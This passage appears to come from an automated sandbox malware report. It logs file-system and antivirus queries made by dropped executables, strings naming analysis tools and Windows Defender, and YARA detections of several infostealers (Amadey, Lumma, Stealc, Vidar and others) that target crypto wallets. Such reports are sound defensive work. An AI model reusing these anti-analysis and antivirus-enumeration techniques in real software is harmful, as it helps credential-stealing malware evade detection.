                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00DF7155
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00DF2BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: 5813f66ed1.exe, 5813f66ed1.exe, 0000000C.00000003.2235867285.000000000117C000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2217835405.000000000117E000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2268622006.000000000117C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                              Source: 5813f66ed1.exe, 0000000C.00000002.2291091940.000000000117E000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2235867285.000000000117C000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2268622006.000000000117C000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2289309472.000000000117E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
                              Source: 5813f66ed1.exe, 5813f66ed1.exe, 0000000C.00000003.2217835405.000000000117E000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2235723400.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2268653170.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290875133.0000000001124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: svchost.exe, 00000014.00000002.2371805038.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regmon.exe
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected Amadeys stealer DLL
                              Source: Yara matchFile source: 3.2.1I15f6.exe.6b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.skotes.exe.610000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 24.2.skotes.exe.610000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 32.2.HIDGCFBFBF.exe.db0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000018.00000003.2397272020.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000020.00000003.2472589310.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1853056053.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000003.1898311651.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000003.3003854832.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000018.00000002.2439837869.0000000000611000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.3046720991.0000000000611000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000020.00000002.2513854677.0000000000DB1000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                              Yara detected Cryptbot
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Yara detected LummaC Stealer
                              Source: Yara matchFile source: Process Memory Space: 5813f66ed1.exe PID: 5552, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Yara detected RHADAMANTHYS Stealer
                              Source: Yara matchFile source: 00000013.00000003.2359297858.0000000004C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000003.2350817257.0000000000E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000003.2359022385.0000000003350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000002.2372094151.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Yara detected Stealc
                              Source: Yara matchFile source: 0000000A.00000002.2486440512.0000000000CA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.2492560230.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000003.1976633314.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 3m20j.exe PID: 5932, type: MEMORYSTR
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Yara detected Vidar stealer
                              Source: Yara matchFile source: Process Memory Space: 3m20j.exe PID: 5932, type: MEMORYSTR
                              Found many strings related to Crypto-Wallets (likely being stolen)
